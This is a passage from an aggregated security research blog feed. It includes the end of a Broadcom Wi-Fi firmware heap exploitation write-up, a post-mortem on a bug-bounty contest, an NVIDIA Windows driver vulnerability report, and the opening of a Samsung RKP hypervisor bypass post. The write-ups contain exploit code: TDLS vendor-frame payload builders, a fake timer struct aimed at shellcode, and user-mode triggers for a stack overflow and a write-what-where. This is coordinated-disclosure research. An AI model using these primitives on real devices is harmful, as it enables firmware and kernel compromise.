However, the search space for possible sizes isn’t that large - assuming we’re only interested in chunk sizes that are not larger than the RAM itself (for obvious reasons), we can simply enumerate each of the heap states produced by overwriting the “size” field of the next chunk with a given value and tearing down the connection. This can be automated by using a script on the sending side (to perform the enumeration), while concurrently acquiring “snapshots” of RAM on the device, and observing their state (whether or not they are consistent, and whether the firmware managed to resume operation after the teardown).
Specifically, it would be highly advantageous if we were able to create a heap state whereby two free chunks overlap one another. In such a condition, allocations taken from one chunk can be used to corrupt the “next” pointer of the other free chunk. This could be used, perhaps, to control the location of subsequent allocations - an interesting primitive in its own right.
In any case, after running through a few chunk sizes, tearing down the TDLS connection and observing the heap state, we come across quite an interesting resulting state! By overwriting the “size” field with the value 72 and tearing down the connection, we achieve the following heap state:
Great! So after tearing down the connection, we are left with a zero-sized free chunk, overlapping a different (larger) free chunk! This means that once an allocation is carved from the large chunk, it will corrupt the “size” and “next” fields of the smaller chunk. This could prove very useful - we could try and point the next free chunk at a memory address whose contents we’d like to modify. As long as the data in that address conforms with the format of a free chunk, we might be able to persuade the heap to overwrite the memory at that address with subsequent allocations.
Finding a Controlled Allocation
To start exploring these possibilities, we’ll first need to create a controlled allocation primitive, meaning we either control the size of the allocation, or its contents, or (ideally) both. Recall that, as we’ve seen previously, it is in fact very hard to trigger allocations during the normal processing of the firmware - nearly all the processing is done in-place. Moreover, even for cases where data is allocated, its lifespan is very short; memory is immediately reclaimed once it’s no longer used.
Be that as it may, we’ve already seen at least one set of data structures whose lifetime is controllable, and which contains multiple different pieces of information - the TDLS connection itself. The firmware must keep all the information pertaining to the TDLS connection as long as it’s active. Perhaps we could find some data structure relating to TDLS which could act as a good candidate for a controlled allocation?
To search for one, let’s start by looking at the function handling each of the TDLS action frames - wlc_tdls_rcv_action_frame. The function starts by reading out the TDLS category and action code. Then, it routes the frame to the appropriate handler function, according to the received action code:

We can see that apart from the regular, specification-defined action codes, the firmware also supports an out-of-spec frame with an action code of 127. Anything out-of-spec is automatically suspect, so that might be as good a place as any to look for our primitive.
Indeed, digging into this function, we find out that it performs a rather curious task. First, it verifies that the first 3 bytes in the frame’s contents match the Wi-Fi alliance OUI (50:6F:9A). Then, it retrieves the fourth byte of the frame, and uses it as a “command code”. Currently, only two vendor-specific commands are implemented, commands #4 and #5. On a high-level; command #4 is used to send a tunneled probe request over the TDLS connection, and command #5 is used to send an “event” notification to the host, signalling that a “special” frame has arrived.
However, much more interestingly, we see that the implementation for command #4 seems relevant to our current pursuit. First, it does not require the existence of a TDLS connection in order to be processed! This allows us to send the frame even after tearing down the connection. Second, by activating heap traces during this function’s execution and reverse-engineering its logic, we find that the function triggers the following high-level sequence of events:
1. if (A) { free(A); }
2. A = malloc(received_frame_size);
3. memcpy(A, received_frame, received_frame_size);
4. B = malloc(788);
5. free(B);
6. C = malloc(284);
7. free(C);
Great! So we get an allocation (A) with a controlled lifetime, a controlled size and controlled contents! What more could we possibly ask for?
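Based on the description above, crafting the payload for such a frame is simple (a sketch; the function and constant names are mine, and the surrounding TDLS category/action-code 127 encapsulation is left to the MLME layer):

#include <stdint.h>
#include <string.h>

#define TDLS_VENDOR_CMD_PROBE 4 /* command #4 - tunneled probe request */

/* Build the vendor-specific payload: Wi-Fi Alliance OUI, command code, and
   attacker-controlled data (which ends up in the controlled allocation A). */
static size_t build_vendor_payload(uint8_t *buf, const uint8_t *data, size_t len)
{
    static const uint8_t wfa_oui[3] = { 0x50, 0x6F, 0x9A };
    memcpy(buf, wfa_oui, sizeof(wfa_oui));
    buf[3] = TDLS_VENDOR_CMD_PROBE;
    memcpy(buf + 4, data, len);
    return 4 + len;
}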
There is one tiny snag, however. Modifying wpa_supplicant to send this crafted TDLS frame results in a resounding failure. While wpa_supplicant allows us to fully control many of the fields in the TDLS frames, it is only a supplicant, not an MLME implementation. This means that the corresponding MLME layer is responsible for composing and sending the actual TDLS frames.
On the setup I’m using for the attack platform, I have a laptop running Ubuntu 16.04, and a TP-Link TL-WN722N dongle. The dongle is a SoftMAC configuration, so the MLME layer in play is the one present in the Linux kernel, namely, the “cfg80211” configuration layer.
When wpa_supplicant wishes to create and send TDLS frames, it does so by sending special requests over Netlink, which are then handled by the cfg80211 framework, and subsequently passed to the SoftMAC layer, “mac80211”. Regrettably, however, mac80211 is unable to process the special vendor frames, and simply rejects them. Nonetheless, this is just a minor inconvenience - I’ve written a few patches to mac80211 which add support for these special vendor frames. After applying these patches, re-compiling and booting the kernel, we are now able to send our crafted frames.
(schematic based on http://processors.wiki.ti.com/index.php/WL127x_WLAN_API_Information)
To allow for easier control over the vendor frames, I’ve also added support for a new command within wpa_supplicant’s CLI - “TDLS_VNDR”. This command allows us to send a crafted TDLS vendor frame with arbitrary data to any MAC address (regardless of whether a TDLS connection is established to that peer).
Putting It All Together
After creating two overlapping chunks, we can now use our controlled allocation primitive to allocate memory from the tail of the larger chunk, thereby pointing the smaller free chunk at a location of our choosing. Whichever location we choose, however, must have valid values for both the “size” and “next” fields, otherwise later calls to malloc and free may fail, possibly crashing the firmware. As a matter of fact, we’ve already seen perfect candidates to stand in for free chunks - in-use chunks!
Recall that in-use chunks specify their size field at the same location free chunks do theirs. As for the “next” pointer, it is unused in in-use chunks, but is set to zero during the allocation of the chunk. This means that by corrupting the free list to point at an in-use chunk, we can trick the heap into thinking it’s just another free chunk - one which, conveniently, also appears to be the last chunk in the freelist.

Now all we need to do is find an in-use chunk containing information that we’d like to overwrite. If we make that chunk the best-fitting chunk in the free list for a subsequent controlled allocation, we’ll get our own data to be allocated there instead of the in-use chunk’s data, effectively replacing the chunk’s contents. This means we’re able to arbitrarily replace the contents of any in-use chunk.
As we’re interested in achieving full code execution, it would be advantageous to locate and overwrite a function pointer in the heap. But… Where can we expect to find such values on the heap? Well, for starters, there are some events in the Wi-Fi standards that must be handled periodically, such as performing scans for adjacent networks. It would probably be a safe bet to assume that the firmware supports handling such periodic timers by using a common API.
Since timers may be created during the firmware’s operation, their data structures (e.g., which function to execute and when) must be stored on the heap. To locate these timers, we can reverse-engineer the IRQ vector table entry, and search for the logic corresponding to handling a timer interrupt. After doing so, we find a linked list of entries whose contents seem to conform to that of the brcms_timer structure, used in the brcmsmac (SoftMAC) driver. After writing a short script, we can dump the list of timers given a RAM snapshot:
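For reference, each entry appears to follow a layout along these lines (a sketch modelled loosely on the open-source brcmsmac driver’s brcms_timer; the firmware’s exact field order and widths are assumptions):

#include <stdint.h>

struct fw_timer {
    struct fw_timer *next;  /* singly linked list, ordered by timeout */
    void (*fn)(void *arg);  /* the function to execute - our target */
    void *arg;              /* argument passed to fn when it fires */
    uint32_t timeout;       /* when the timer should fire */
    uint32_t periodic;      /* whether the timer re-arms after firing */
};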

We can see that the timer list is ordered by the timeout value, and most of the timers have a relatively short timeout. Moreover, all the timers are allocated during the firmware’s initialisation, and are therefore stored at constant addresses. This is important since, if we’d like to target our free chunk at a timer, we’d need to know its exact location in memory.
So all that’s left is to use our two primitives to replace the contents of one of the timers above with our own data, consequently pointing the timer’s function at an address of our choosing.
Here’s the game plan. First, we’ll use the techniques described above to create two overlapping free chunks. Now, we can use the controlled allocation primitive to point the smaller free chunk at one of the timers in the list above. Next, we create another controlled allocation (freeing the old one). This one will be of size 0x3C, for which the timer chunk is the best-fitting. Therefore, at this point, we’ll overwrite the timer’s contents.

But which function do we point our timer to? Well, we can use the same trick to commandeer another in-use chunk on the heap, and overwrite its contents with our own shellcode. After briefly searching the heap, we come across a large chunk which simply contains console data during the chip’s boot sequence, and is then left allocated but unused. Not only is the allocation fairly large (0x400 bytes), but it is also placed at a constant address (since it is allocated during the firmware’s initialisation sequence) - perfect for our exploit.
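Concretely, the 0x3C-byte controlled allocation replacing the timer chunk might be populated like so (a sketch reusing the hypothetical fw_timer layout from above; SHELLCODE_ADDR stands for the constant address of the hijacked console chunk, and the timeout semantics are likewise assumptions):

#define SHELLCODE_ADDR 0x1E0000u /* hypothetical console chunk address */

struct fw_timer fake_timer = {
    .next     = NULL,
    .fn       = (void (*)(void *))SHELLCODE_ADDR, /* jump to our shellcode */
    .arg      = NULL,
    .timeout  = 1, /* fire as soon as possible */
    .periodic = 0, /* one-shot */
};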
Lastly, how can we be sure that the contents of the heap are even executable? After all, the ARM Cortex R4 has a Memory Protection Unit (MPU). Unlike an MMU, it does not allow for the facilitation of a virtual address space, but it does allow control over the access permissions of different memory ranges in RAM. Using the MPU, the heap could (and should) be marked as RW and non-executable.
By reversing the firmware’s initialisation routines in the binary, we can see that the MPU is indeed being activated during boot. But what are the contents with which it’s configured? We can find out by writing a small assembly stub to dump out the contents of the MPU:
0x00000000 - 0x10000000
AP: 3 - Full access
XN: 0
0x10000000 - 0x20000000
AP: 3 - Full access
XN: 0
0x20000000 - 0x40000000
AP: 3 - Full access
XN: 0
0x40000000 - 0x80000000
AP: 3 - Full access
XN: 0
0x80000000 - 0x100000000
AP: 3 - Full access
XN: 0
Ah-ha - while the MPU is initialised, it is effectively set to mark all of memory as RWX, making it useless. This saves us some hassle… We can conveniently execute our code directly from the heap.
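For completeness, here’s roughly what such a dumper might look like (a sketch assuming a privileged execution context on the firmware, 8 implemented MPU regions - MPUIR holds the real count - and with printf standing in for whatever output channel is available):

#include <stdint.h>
#include <stdio.h>

static void dump_mpu(void)
{
    for (unsigned region = 0; region < 8; region++) {
        uint32_t base, size_en, access;
        asm volatile("mcr p15, 0, %0, c6, c2, 0" :: "r"(region)); /* RGNR: select region */
        asm volatile("mrc p15, 0, %0, c6, c1, 0" : "=r"(base));    /* DRBAR: region base */
        asm volatile("mrc p15, 0, %0, c6, c1, 2" : "=r"(size_en)); /* DRSR: size + enable */
        asm volatile("mrc p15, 0, %0, c6, c1, 4" : "=r"(access));  /* DRACR: access control */
        printf("region %u: base=0x%08x size/en=0x%08x AP=%u XN=%u\n",
               region, (unsigned)base, (unsigned)size_en,
               (unsigned)((access >> 8) & 7),    /* AP bits [10:8] */
               (unsigned)((access >> 12) & 1));  /* XN bit [12] */
    }
}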
So, at long last, we have an exploit ready! Putting it all together we can now hijack a code chunk to store our shellcode, then hijack a timer to point it at our stored shellcode. Once the timer expires, our code will be executed on the firmware!

At long last, we’ve gone through the entire process of researching the platform, discovering a vulnerability and writing a full-fledged exploit. Although this post is relatively long, there are many smaller details that I left out in favour of brevity. If you have any specific questions, please let me know. You can find the full exploit, including instructions, here. The exploit includes a relatively benign shellcode, which simply writes a magic value to address 0x200000 in the firmware’s RAM, signalling successful execution.
Wrapping Up
We’ve seen that while the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security. Specifically, it lacks all basic exploit mitigations - including stack cookies, safe unlinking and access permission protection (by means of an MPU).
Broadcom have informed me that newer versions of the SoC utilise the MPU, along with several additional hardware security mechanisms. This is an interesting development and a step in the right direction. They are also considering implementing exploit mitigations in future firmware versions.
In the next blog post, we’ll see how we can use our assumed control of the Wi-Fi SoC in order to further escalate our privileges into the application processor, taking over the host’s operating system!
Categories: Security

Project Zero Prize Conclusion

Wed, 03/29/2017 - 14:12
Posted by Natalie Silvanovich, Project Zero
On September 13, 2016 we announced the Project Zero Prize. It concluded last week with no prizes awarded. The purpose of this post is to discuss what happened and what we learned about hacking contest design.
Throughout the contest, we did not receive any valid entries or bugs (everything we received was either spam, or did not remotely resemble a contest entry as described in the rules). We did hear from some teams and individuals who said they were working on the contest, but they did not submit any bugs or entries. Based on our discussions with them, as well as our general observations during the contest, we suspect that the following factors led to the lack of entries.
Entry Point Difficulty
It is rare for fully remote Android bugs to be reported, and it is likely that this was a sticking point for participants. The majority of Android bug chains begin with some user interaction, especially clicking a link, which was not allowed in this contest. While this type of bug is not unheard of, it is likely difficult to find quality bugs in this area. This means that the timeframe of the contest or prize amount may not have been adequate to elicit this type of bug.
Competing Contests
The Project Zero Prize rules were intended to encourage participants to file partial bug chains in the Android bug tracker during the contest, even if a full chain was not complete. In designing these rules, we underestimated the impact of other contests on participants’ incentives. The contest rules allowed for bugs that had already been filed to be used by the first filer at any point during the contest, and receive Android Security Rewards if they were not used as a part of a chain. We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common. Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.
Prize Amount
It’s difficult to determine the right prize amount for this type of contest, and the fact that we did not receive any entries suggests that the prize amount might have been too low considering the type of bugs required to win this contest.
Overall, this contest was a learning experience, and we hope to put what we’ve learned to use in Google’s rewards programs and future contests. Stay tuned! Also, if there were any aspects of the Project Zero Prize that affected your participation that we could improve, we would like to hear from you, either in the comments, or at project-zero-prize@google.com.
Categories: Security

Attacking the Windows NVIDIA Driver

Tue, 02/14/2017 - 19:03
Posted by Oliver Chang
Modern graphic drivers are complicated and provide a large promising attack surface for EoPs and sandbox escapes from processes that have access to the GPU (e.g. the Chrome GPU process). In this blog post we’ll take a look at attacking the NVIDIA kernel mode Windows drivers, and a few of the bugs that I found. I did this research as part of a 20% project with Project Zero, during which a total of 16 vulnerabilities were discovered.
Kernel WDDM interfaces
The kernel mode component of a graphics driver is referred to as the display miniport driver. Microsoft’s documentation has a nice diagram that summarises the relationship between the various components:

In the DriverEntry() for display miniport drivers, a DRIVER_INITIALIZATION_DATA structure is populated with callbacks to the vendor implementations of functions that actually interact with the hardware, which is passed to dxgkrnl.sys (DirectX subsystem) via DxgkInitialize(). These callbacks can either be called by the DirectX kernel subsystem, or in some cases get called directly from user mode code.
DxgkDdiEscape
A well known entry point for potential vulnerabilities here is the DxgkDdiEscape interface. This can be called straight from user mode, and accepts arbitrary data that is parsed and handled in a vendor specific way (essentially an IOCTL). For the rest of this post, we’ll use the term “escape” to denote a particular command that’s supported by the DxgkDdiEscape function.
NVIDIA has a whopping ~400 escapes here at the time of writing, so this was where I spent most of my time (the necessity of many of these being in the kernel is questionable):

// (names of these structs are made up by me)
// Represents a group of escape codes
struct NvEscapeRecord {
 DWORD action_num;
 DWORD expected_magic;
 void *handler_func;
 NvEscapeRecordInfo *info;
 _QWORD num_codes;
};

// Information about a specific escape code.
struct NvEscapeCodeInfo {
 DWORD code;
 DWORD unknown;
 _QWORD expected_size;
 WORD unknown_1;
};
NVIDIA implements their private data (pPrivateDriverData in the DXGKARG_ESCAPE struct) for each escape as a header followed by data. The header has the following format:
struct NvEscapeHeader {
 DWORD magic;
 WORD unknown_4;
 WORD unknown_6;
 DWORD size;
 DWORD magic2;
 DWORD code;
 DWORD unknown[7];
};
These escapes are identified by a 32-bit code (first member of the NvEscapeCodeInfo struct above), and are grouped by their most significant byte (from 1 - 9).
There is some validation being done before each escape code is handled. In particular, each NvEscapeCodeInfo contains the expected size of the escape data following the header. This is validated against the size in the NvEscapeHeader, which itself is validated against the PrivateDriverDataSize field given to DxgkDdiEscape. However, it’s possible for the expected size to be 0 (usually when the escape data is expected to be variable sized) which means that the escape handler is responsible for doing its own validation. This has led to some bugs (1, 2).
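Putting the pieces together, the central validation flow looks roughly like this (an illustrative sketch reusing the made-up struct names from earlier; lookup_escape_code and the exact status codes are my own):

NTSTATUS validate_escape(NvEscapeHeader *hdr, ULONG PrivateDriverDataSize)
{
    NvEscapeCodeInfo *info = lookup_escape_code(hdr->code); /* hypothetical */
    if (!info)
        return STATUS_INVALID_PARAMETER;

    /* The size in the header must fit within the escape buffer. */
    if (sizeof(NvEscapeHeader) + hdr->size > PrivateDriverDataSize)
        return STATUS_INVALID_PARAMETER;

    /* Fixed-size escapes are validated centrally... */
    if (info->expected_size != 0 && hdr->size != info->expected_size)
        return STATUS_INVALID_PARAMETER;

    /* ...but for expected_size == 0 (variable-sized escapes), the handler
       must validate hdr->size itself - forgetting this led to the bugs
       referenced above. */
    return STATUS_SUCCESS;
}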
Most of the vulnerabilities found (13 in total) in escape handlers were very basic mistakes, such as writing to user provided pointers blindly, disclosing uninitialised kernel memory to user mode, and incorrect bounds checking. There were also numerous issues that I noticed (e.g. OOB reads) that I didn’t report because they didn’t seem exploitable.
DxgkDdiSubmitBufferVirtual
Another interesting entry point is the DxgkDdiSubmitBufferVirtual function, which is newly introduced in Windows 10 and WDDM 2.0 to support GPU virtual memory (deprecating the old DxgkDdiSubmitBuffer/DxgkDdiRender functions). This function is fairly complicated, and also accepts vendor specific data from the user mode driver for each command submitted. One bug was found here.
Others
There are a few other WDDM functions that accept vendor-specific data, but nothing of interest was found in those after a quick review.
Exposed devices
NVIDIA also exposes some additional devices that can be opened by any user:
  • \\.\NvAdminDevice which appears to be used for NVAPI. A lot of the ioctl handlers seem to call into DxgkDdiEscape.
  • \\.\UVMLite{Controller,Process*}, likely related to NVIDIA’s “unified memory”. 1 bug was found here.
  • \\.\NvStreamKms, installed by default as part of GeForce Experience, but you can opt out during installation. It’s not exactly clear why this particular driver is necessary. 1 bug was found here also.
More interesting bugs
Most of the bugs were found by manual reversing and analysis, along with some custom IDA scripts. I also ended up writing a fuzzer, which was surprisingly successful given how simple it was.
While most of the bugs were rather boring (simple cases of missing validation), there were a few that were a bit more interesting.
NvStreamKms
This driver registers a process creation notification callback using the PsSetCreateProcessNotifyRoutineEx function. This callback checks if new processes created on the system match image names that were previously set by sending IOCTLs.
This creation notification routine contained a bug:
(Simplified decompiled output)
wchar_t Dst[BUF_SIZE];

...

if ( cur->image_names_count > 0 ) {
 // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
 image_filename = info_->ImageFileName;
 buf = image_filename->Buffer;
 if ( buf ) {
   filename_length = 0i64;
   num_chars = image_filename->Length / 2;
   // Look for the filename by scanning for backslash.
   if ( num_chars ) {
     while ( buf[num_chars - filename_length - 1] != '\\' ) {
       ++filename_length;
       if ( filename_length >= num_chars )
         goto DO_COPY;
     }
     buf += num_chars - filename_length;
   }
DO_COPY:
   wcscpy_s(Dst, filename_length, buf);
   Dst[filename_length] = 0;
   wcslwr(Dst);
This routine extracts the image name from the ImageFileName member of PS_CREATE_NOTIFY_INFO by searching backwards for backslash (‘\’). This is then copied to a stack buffer (Dst) using wcscpy_s, but the length passed is the length of the calculated name, and not the length of the destination buffer.
Even though Dst is a fixed size buffer, this isn’t a straightforward overflow. Its size is bigger than 255 wchars, and for most Windows filesystems path components cannot be greater than 255 characters. Scanning for backslash is also valid for most cases because ImageFileName is a canonicalised path.
It is, however, possible to pass a UNC path that keeps forward slash (‘/’) as the path separator after being canonicalised (credits to James Forshaw for pointing me to this). This means we can get a filename of the form “aaa/bbb/ccc/...” and cause an overflow.
For example: CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\aaaa/bbbb/cccc/blah.exe", …)
Another interesting note is that the wcslwr following the bad copy doesn’t actually limit the contents of the overflow (the only requirement is valid UTF-16). Since the calculated filename_length doesn’t include the null terminator, wcscpy_s will think that the destination is too small and will clear the destination string by writing a null byte at the beginning (after copying the contents up to filename_length bytes first so the overflow still happens). This means that the wcslwr is useless because this wcscpy_s call and part of the code never worked to begin with.
Exploiting this is trivial, as the driver is not compiled with stack cookies (hacking like it’s 1999). A local privilege escalation exploit is attached in the original issue that sets up a fake WebDAV server to exploit the vulnerability (ROP, pivot stack to user buffer, ROP again to allocate rwx mem containing shellcode and jump to it).
Incorrect validation in UVMLiteController
NVIDIA’s driver also exposes a device at \\.\UVMLiteController that can be opened by any user (including from the sandboxed Chrome GPU process). The IOCTL handlers for this device write results directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl (Microsoft’s documentation says not to do this). The IO control codes specify METHOD_BUFFERED, which means that the Windows kernel checks that the address range provided is writeable by the user before passing it off to the driver.
However, these handlers lacked bounds checking for the output buffer, which means that a user mode context could pass a length of 0 with any arbitrary address (which passes the ProbeForWrite check) to result in a limited write-what-where (the “what” here is limited to some specific values: including 32-bit 0xffff, 32-bit 0x1f, 32-bit 0, and 8-bit 0).
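To illustrate, a minimal user-mode trigger might look like this (a sketch; the IOCTL code and target address are placeholders, the real values are in the original issue):

#include <windows.h>

int main(void)
{
    HANDLE h = CreateFileW(L"\\\\.\\UVMLiteController",
                           GENERIC_READ | GENERIC_WRITE, 0, NULL,
                           OPEN_EXISTING, 0, NULL);
    DWORD returned = 0;
    /* An output length of 0 passes the writability probe for any address,
       but the handler writes to Irp->UserBuffer regardless, producing the
       limited write-what-where described above. */
    DeviceIoControl(h, 0x220004 /* placeholder IOCTL code */, NULL, 0,
                    (LPVOID)(ULONG_PTR)0xFFFFF78000000800ULL, 0,
                    &returned, NULL);
    return 0;
}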
A simple privilege escalation exploit is attached in the original issue.
Remote attack vector?
Given the quantity of bugs that were discovered, I investigated whether any of them can be reached from a completely remote context without having to compromise a sandboxed process first (e.g. through WebGL in a browser, or through video acceleration).
Luckily, this didn’t appear to be the case. This wasn’t too surprising, given that the vulnerable APIs here are very low level and only reached after going through many layers (for Chrome, libANGLE -> Direct3D runtime and user mode driver -> kernel mode driver), and generally called with valid arguments constructed in the user mode driver.
NVIDIA’s response
The nature of the bugs found showed that NVIDIA has a lot of work to do. Their drivers contained a lot of code which probably shouldn’t be in the kernel, and most of the bugs discovered were very basic mistakes. One of their drivers (NvStreamKms.sys) also lacks very basic mitigations (stack cookies) even today.
However, their response was mostly quick and positive. Most bugs were fixed well under the deadline, and it seems that they’ve been finding some bugs on their own internally. They also indicated that they’ve been working on re-architecting their kernel drivers for security, but weren’t ready to share any concrete details.
Timeline
2016-07-26: First bug reported to NVIDIA.
2016-09-21: 6 of the bugs reported were fixed silently in the 372.90 release. Discussed patch gap issues with NVIDIA.
2016-10-23: Patch released that includes fix for rest (all 14) of the bugs that were reported at the time (375.93).
2016-10-28: Public bulletin released, and P0 bugs derestricted.
2016-11-04: Realised that https://bugs.chromium.org/p/project-zero/issues/detail?id=911 wasn’t fixed properly. Notified NVIDIA.
2016-12-14: Fix for issue 911 released along with bulletin.
2017-02-14: Final two bugs fixed.
Patch gap
NVIDIA’s first patch, which included fixes to 6 of the bugs I reported, did not include a public bulletin (the release notes mention “security updates”). They had planned to release public details a month after the patch was released. We noticed this, and let them know that we didn’t consider this to be good practice, as an attacker can reverse the patch to find the vulnerabilities before the public is made aware of the details, given this large window.
While the first 6 bugs fixed did not have details released for more than 30 days, the remaining 8 at the time had a patch released 5 days before the first bulletin was released. It looks like NVIDIA has been trying to reduce this gap, but based on recent bulletins it appears to be inconsistent.
Conclusion
Given the large attack surface exposed by graphics drivers in the kernel and the generally lower quality of third party code, it appears to be a very rich target for finding sandbox escapes and EoP vulnerabilities. GPU vendors should try to limit this by moving as much attack surface as they can out of the kernel.
Categories: Security

Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection

Wed, 02/08/2017 - 12:24
Posted by Gal Beniamini, Project Zero
Traditionally, the operating system’s kernel is the last security boundary standing between an attacker and full control over a target system. As such, additional care must be taken in order to ensure the integrity of the kernel. First, when a system boots, the integrity of its key components, including that of the operating system’s kernel, must be verified. This is achieved on Android by the verified boot chain. However, simply booting an authenticated kernel is insufficient - what about maintaining the integrity of the kernel while the system is executing?
Imagine a scenario where an attacker is able to find and exploit a vulnerability in the operating system’s kernel. Using such a vulnerability, the attacker may attempt to subvert the integrity of the kernel itself, either by modifying the contents of its code, or by introducing new attacker-controlled code and running it within the context of the operating system. Even more subtly, the attacker may choose to modify the data structures used by the operating system in order to alter its behaviour (for example, by granting excessive rights to select processes). As the kernel is in charge of managing all memory translations, including its own, there is no mechanism in place preventing an attacker within the same context from doing so.
However, in keeping with the concept of “defence in depth”, additional layers may be added in order to safeguard the kernel against such would-be attackers. If stacked correctly, these layers may be designed in such a way which either severely limits or simply prevents an attacker from subverting the kernel’s integrity.
In the Android ecosystem, Samsung provides a security hypervisor which aims to tackle the problem of ensuring the integrity of the kernel during runtime. The hypervisor, dubbed “Real-Time Kernel Protection” (RKP), was introduced as part of Samsung KNOX. In this blog post we’ll take an in-depth look at the inner workings of RKP and present multiple vulnerabilities which allowed attackers to subvert each of RKP’s security mechanisms. We’ll also see how the design of RKP could be fortified in order to prevent future attacks of this nature, making exploitation of RKP much harder.
As always, all the vulnerabilities in this article have been disclosed to Samsung, and the fixes have been made available in the January SMR.
I would like to note that in addition to addressing the reported issues, the Samsung KNOX team has been extremely helpful and open to discussion. This dialogue helped ensure that the issues were diagnosed correctly and the root causes identified. Moreover, the KNOX team has reviewed this article in advance, and have provided key insights into future improvements planned for RKP based on this research.
I would especially like to thank Tomislav Suchan from the Samsung KNOX team for helping address every single query I had and for providing deep insightful responses. Tomislav’s hard work ensured that all the issues were addressed correctly and fully, leaving no stone unturned.
HYP 101
Before we can start exploring the architecture of RKP, we first need a basic understanding of the virtualisation extensions on ARMv8. In the ARMv8 architecture, a new concept of exception levels was introduced. Generally, discrete components run under different exception levels - the more privileged the component, the higher its exception level.

In this blog post we’ll only focus on exception levels within the “Normal World”. Within this context, EL0 represents user-mode processes running on Android, EL1 represents Android’s Linux kernel, and EL2 (also known as “HYP” mode) represents the RKP hypervisor.
Recall that when user-mode processes (EL0) wish to interact with the operating system’s kernel (EL1), they must do so by issuing “Supervisor Calls” (SVCs), triggering exceptions which are then handled by the kernel. Much in the same way, interactions with the hypervisor (EL2) are performed by issuing “Hypervisor Calls” (HVCs).
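To make this concrete, issuing an HVC from EL1 kernel code looks roughly like this (a sketch in AArch64 GCC inline assembly; the immediate and the register-based calling convention shown are illustrative assumptions, not RKP’s actual ABI):

#include <stdint.h>

static inline uint64_t hvc_call(uint64_t cmd, uint64_t arg)
{
    register uint64_t x0 asm("x0") = cmd; /* command selector */
    register uint64_t x1 asm("x1") = arg; /* command argument */
    asm volatile("hvc #0"                 /* trap into EL2 */
                 : "+r"(x0)
                 : "r"(x1)
                 : "memory");
    return x0;                            /* result returned in x0 */
}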
Additionally, the hypervisor may control key operations that are performed within the kernel, by using the “Hypervisor Configuration Register” (HCR). This register governs over the virtualisation features that enable EL2 to interact with code running in EL1. For example, setting certain bits in the HCR will cause the hypervisor to trap specific operations which would normally be handled by EL1, enabling the hypervisor to choose whether to allow or disallow the requested operation.
Lastly, the hypervisor is able to implement an additional layer of memory translation, called a “stage 2 translation”. Instead of using the regular model where the operating system’s translation table maps between virtual addresses (VAs) and physical addresses (PAs), the translation process is split in two.
First, the EL1 translation tables are used in order to map a given VA to an intermediate physical address (IPA) - this is called a “stage 1 translation”. In the process, the access controls present in the translation are also applied, including access permission (AP) bits, execute never (XN) and privileged execute never (PXN).
Then, the resulting IPA is translated to a PA by performing a “stage 2 translation”. This mapping is performed by using a translation table which is accessible to EL2, and is inaccessible to code running in EL1. By using this 2-stage translation regime, the hypervisor is able to prevent access to certain key regions of physical memory, which may contain sensitive data that should be kept secret from EL1.
Creating a Research Platform
As we just saw in our “HYP 101” lesson, communicating with EL2 explicitly is done by issuing HVCs. Unlike SVCs which may be freely issued by code running in EL0, HVCs can only be triggered by code running in EL1. Since RKP runs in EL2 and exposes the vast majority of its functionality by means of commands which can be triggered from HVCs, we first need a platform from which we are able to send arbitrary HVCs.
Fortunately, in a recent blog post, we already covered an exploit that allowed us to elevate privileges into the context of system_server. This means that all that’s left before we can start investigating RKP and interacting with EL2, is to find an additional vulnerability that allows escalation from an already privileged context (such as system_server), to the context of the kernel.
Luckily, simply surveying the attack surface exposed to such privileged contexts revealed a vast amount of relatively straightforward vulnerabilities, any of which could be used to gain some foothold in EL1. For the purpose of this research, I’ve decided to exploit the most convenient of these: a simple stack overflow in a sysfs entry, which could be used to gain arbitrary control over the stack contents for a kernel thread. Once we have control over the stack’s contents, we can construct a ROP payload that prepares arguments for a function call in the kernel, calls that function, and returns the results back to user-space.

In order to ease exploitation, we can wrap the entire process of creating a ROP stack which calls a kernel function and returns the results to user-space, into a single function, which we’ll call “execute_in_kernel”. Combined with our shellcode wrapper, which converts normal-looking C code to shellcode that can be injected into system_server, we are now able to freely construct and run code which is able to invoke kernel functions on demand.
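The resulting interface boils down to something like this (an illustrative sketch - the signature and the read-gadget example are my own assumptions):

#include <stdint.h>

/* Triggers the sysfs stack overflow with a ROP chain that calls
   fn(arg0, arg1) in EL1 and copies the return value back to user-space. */
uint64_t execute_in_kernel(uint64_t fn, uint64_t arg0, uint64_t arg1);

/* Example: arbitrary kernel reads built on top of it, using a simple "read
   gadget" - any kernel function that dereferences its first argument. */
static uint64_t kernel_read64(uint64_t read_gadget_addr, uint64_t addr)
{
    return execute_in_kernel(read_gadget_addr, addr, 0);
}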


Putting it all together, we can start investigating and interacting with RKP using this robust research platform. The rest of the research detailed in this blog post was conducted on a fully updated Galaxy S7 Edge (SM-G935F, XXS1APG3, Exynos chipset), using this exact framework in order to inject code into system_server using the first exploit, and then run code in the kernel using the second exploit.
Finally, now that we’ve laid down all the needed foundations, let’s get cracking!
Mitigation #1 - KASLR
With the introduction of KNOX v2.6, Samsung devices implement Kernel Address Space Layout Randomisation (KASLR). This security feature introduces a random “offset”, generated each time the device boots, by which the base address of the kernel is shifted. Normally, the kernel is loaded into a fixed physical address, which corresponds to a fixed virtual address in the VAS of the kernel. By introducing KASLR, all the kernel’s memory, including its code, is shifted by this randomised offset (also known as a “slide”).
While KASLR may be a valid mitigation against remote attackers aiming to exploit the kernel, it is very hard to implement in a robust way against local attackers. In fact, there has been some very interesting recent research on the subject which manages to defeat KASLR without requiring any software bug (e.g., by observing timing differences).
While those attacks are quite interesting in their own right, it should be noted that bypassing KASLR can often be achieved much more easily. Recall that the entire kernel is shifted by a single “slide” value - this means that leaking any pointer in the kernel which resides at a known offset from the kernel’s base address would allow us to easily calculate the slide’s value.
